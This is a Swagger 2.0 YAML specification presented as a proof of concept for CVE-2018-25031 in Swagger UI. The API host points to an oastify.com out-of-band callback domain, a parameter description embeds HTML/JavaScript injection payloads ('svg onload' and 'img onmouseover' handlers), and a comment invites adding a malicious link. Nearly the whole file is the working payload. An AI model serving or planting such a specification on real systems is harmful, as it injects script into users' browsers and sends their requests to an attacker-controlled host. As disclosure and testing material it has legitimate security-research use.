swagger: '2.0'
info:
  version: 1.0.0
  title: Swagger CVE-2018-25031
  description: A simple POC CVE-2018-25031
schemes: 
- https
host: w748zyi7gxdannpe86vo6r00frli98xx.oastify.com
basePath: /v1
paths:
  /data/{Authorization}:
   get:
      parameters: # Bellow, You can add a malicious link or add the link with XSS Vulnerability more information: https://github.com/VictorNS69/swagger-ui-xss
      - description: |
          You need to add the <b>Authorization Code</b> to use the API.
          Please check this <svg/onload=confirm(1)> <img src=x onmouseover=prompt(5)></img>
        format: int64
        in: path
        name: Authorization
        required: true
        type: string
      tags:
      - Swagger POC CVE 2018-25031
      operationId: afine
      summary: POC
